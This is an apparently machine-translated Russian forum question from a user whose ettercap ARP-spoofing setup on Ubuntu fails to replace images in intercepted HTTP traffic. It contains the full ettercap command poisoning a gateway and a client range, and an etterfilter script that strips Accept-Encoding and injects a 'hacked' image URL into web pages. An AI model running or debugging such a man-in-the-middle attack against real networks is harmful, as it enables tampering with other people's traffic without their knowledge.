Я использую ettercap 0.8.2 в Ubuntu 18.04 и следую этому уроку https://www.go4expert.com/articles/mitm-with-ettercap-t11842/
Я сделал следующие шаги:
установил ip_forward в 1
раскомментируйте строки ip_tables в etter.conf
создали filter.ef и запустили ettercap с помощью следующей команды
sudo ettercap -Tq -M arp:remote /IP-of-gateway// /IP-range-of-clients(1-255)// -P autoadd
После этого всякий раз, когда я захожу на какой-либо веб-сайт с использованием любого клиента, в фильтре «Заменена картинка» появляется строка сообщения. печатается много раз в терминале, но ни одно из изображений не заменяется.
Я также выполнил tcpdump для захвата пакетов и просмотрел его в wireshark, и ни один из пакетов не был изменен. То есть я искал 'img src = "' в подписке tcp, но ни один из них не был изменен фильтром.
Фильтр, который я использовал, это
if (ip.proto == TCP && tcp.dst == 80) {
if (search(DATA.data, "Accept-Encoding")) {
replace("Accept-Encoding", "Accept-Rubbish!");
msg("Modified Accept-Encoding!\n");
}
}
if (ip.proto == TCP && tcp.src == 80) {
replace("img src=", "img src=\"http://img405.imageshack.us/img405/328/hacked28hi.png\" ");
replace("IMG SRC=", "img src=\"http://img405.imageshack.us/img405/328/hacked28hi.png\" ");
msg("Replaced the picture.\n");
}
if (ip.proto == UDP && udp.src == 80) {
replace("img src=", "img src=\"http://img405.imageshack.us/img405/328/hacked28hi.png\" ");
replace("IMG SRC=", "img src=\"http://img405.imageshack.us/img405/328/hacked28hi.png\" ");
msg("Replaced the picture.\n");
}
, который взятиз учебника, связанного выше.